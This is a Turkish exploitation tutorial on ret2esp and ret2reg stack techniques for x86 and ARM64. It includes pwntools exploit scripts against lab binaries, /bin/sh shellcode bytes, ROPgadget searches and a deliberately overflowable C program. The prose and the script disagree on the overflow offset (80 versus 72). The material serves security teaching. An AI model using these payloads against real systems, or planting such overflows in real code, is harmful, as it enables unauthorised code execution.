Ret2esp / Ret2reg

Ret2esp

Çünkü ESP (Yığın İşaretçisi) her zaman yığının en üstüne işaret eder, bu teknik EIP'yi (Talimat İşaretçisi) jmp esp veya call esp talimatının adresi ile değiştirmeyi içerir. Bunu yaparak, shellcode, üzerine yazılmış EIP'nin hemen arkasına yerleştirilir. ret talimatı çalıştığında, ESP bir sonraki adrese işaret eder, tam olarak shellcode'un saklandığı yere.

Eğer Adres Alanı Düzeni Rastgeleleştirme (ASLR) Windows veya Linux'ta etkin değilse, paylaşılan kütüphanelerde bulunan jmp esp veya call esp talimatlarını kullanmak mümkündür. Ancak, ASLR aktif olduğunda, bu talimatları bulmak için savunmasız programın kendisine bakmak gerekebilir (ve PIE ile başa çıkmanız gerekebilir).

Ayrıca, shellcode'u EIP bozulmasından sonra yerleştirebilmek, yığın ortasında değil, işlevin çalışması sırasında gerçekleştirilen herhangi bir push veya pop talimatının shellcode ile çakışmamasını sağlar. Bu çakışma, shellcode'un işlevin yığınının ortasına yerleştirilmesi durumunda meydana gelebilir.

Alan eksikliği

Eğer RIP'yi üzerine yazdıktan sonra yazmak için alan eksikse (belki sadece birkaç bayt), başlangıçta bir jmp shellcode'u yazın:

sub rsp, 0x30
jmp rsp

Ve shellcode'u yığın içinde erken yazın.

Örnek

Bu tekniğin bir örneğini https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp adresinde, son bir istismar ile bulabilirsiniz:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

jmp_rsp = next(elf.search(asm('jmp rsp')))

payload = b'A' * 120
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 10;
jmp rsp;
''')

pause()
p.sendlineafter('RSP!\n', payload)
p.interactive()

Bu tekniğin bir başka örneğini https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html adresinde görebilirsiniz. NX etkinleştirilmeden bir buffer overflow var, $esp adresini küçültmek için bir gadget kullanılıyor ve ardından shellcode'a atlamak için jmp esp; kullanılıyor:

# From https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html
from pwn import *

# Establish the target process
target = process('./b0verflow')
#gdb.attach(target, gdbscript = 'b *0x080485a0')

# The shellcode we will use
# I did not write this, it is from: http://shell-storm.org/shellcode/files/shellcode-827.php
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

# Establish our rop gadgets

# 0x08048504 : jmp esp
jmpEsp = p32(0x08048504)

# 0x080484fd : push ebp ; mov ebp, esp ; sub esp, 0x24 ; ret
pivot = p32(0x80484fd)

# Make the payload

payload = ""
payload += jmpEsp # Our jmp esp gadget
payload += shellcode # Our shellcode
payload += "1"*(0x20 - len(shellcode)) # Filler between end of shellcode and saved return address
payload += pivot # Our pivot gadget

# Send our payload
target.sendline(payload)

# Drop to an interactive shell
target.interactive()

Ret2reg

Benzer şekilde, bir fonksiyonun shellcode'un saklandığı adresi döndürdüğünü biliyorsak, shellcode'umuzu çalıştırmak için call eax veya jmp eax talimatlarını (bilinen ret2eax tekniği) kullanabiliriz. Eax gibi, ilginç bir adres içeren herhangi bir başka kayıt da kullanılabilir (ret2reg).

Örnek

Burada bazı örnekler bulabilirsiniz:

• https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg

• https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c

• strcpy, shellcode'un saklandığı tamponun adresini eax'de saklayacak ve eax üzerine yazılmadığı için ret2eax kullanmak mümkün.

ARM64

Ret2sp

ARM64'te SP kaydına atlamaya izin veren talimatlar yoktur. SP'yi bir kayda taşıyan ve sonra o kayda atlayan bir gadget bulmak mümkün olabilir, ancak benim kali'mdeki libc'de böyle bir gadget bulamadım:

for i in `seq 1 30`; do
ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)";
done

Keşfettiğim tek şey, sp'nin kopyalandığı kaydın değerini değiştirecek olanlardı (bu yüzden işe yaramaz hale gelecekti):

Ret2reg

Eğer bir kaydın ilginç bir adresi varsa, uygun talimatı bulup ona atlamak mümkündür. Şöyle bir şey kullanabilirsiniz:

ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei " b[a-z]* x[0-9][0-9]?";

ARM64'te, bir fonksiyonun dönüş değerini saklayan x0'dır, bu nedenle x0'ın, kullanıcı tarafından kontrol edilen ve çalıştırılacak bir shellcode içeren bir tamponun adresini sakladığı durumlar olabilir.

Örnek kod:

// clang -o ret2x0 ret2x0.c -no-pie -fno-stack-protector -Wno-format-security -z execstack

#include <stdio.h>
#include <string.h>

void do_stuff(int do_arg){
if (do_arg == 1)
__asm__("br x0");
return;
}

char* vulnerable_function() {
char buffer[64];
fgets(buffer, sizeof(buffer)*3, stdin);
return buffer;
}

int main(int argc, char **argv) {
char* b = vulnerable_function();
do_stuff(2)
return 0;
}

Fonksiyonun ayrıştırmasını kontrol ettiğimizde, tamponun adresinin (bof'a karşı savunmasız ve kullanıcı tarafından kontrol edilen) x0'da saklandığını görebiliriz, tampon taşmasından dönerken:

Ayrıca do_stuff fonksiyonunda br x0 gadget'ını bulmak da mümkündür:

Bu gadget'ı kullanarak ona atlayacağız çünkü ikili dosya PIE OLMADAN derlenmiştir. Bir desen kullanarak, tampon taşmasının ofsetinin 80 olduğunu görebiliriz, bu nedenle istismar şöyle olacaktır:

from pwn import *

p = process('./ret2x0')
elf = context.binary = ELF('./ret2x0')

stack_offset = 72
shellcode = asm(shellcraft.sh())
br_x0 = p64(0x4006a0) # Addr of: br x0;
payload = shellcode + b"A" * (stack_offset - len(shellcode)) + br_x0

p.sendline(payload)
p.interactive()

Koruma Önlemleri

• NX: Yığın çalıştırılabilir değilse, bu yardımcı olmaz çünkü shellcode'u yığında yerleştirip çalıştırmak için atlamamız gerekiyor.

• ASLR & PIE: Bunlar esp veya başka bir kayda atlayacak bir talimat bulmayı zorlaştırabilir.

Referanslar

• https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode

• https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp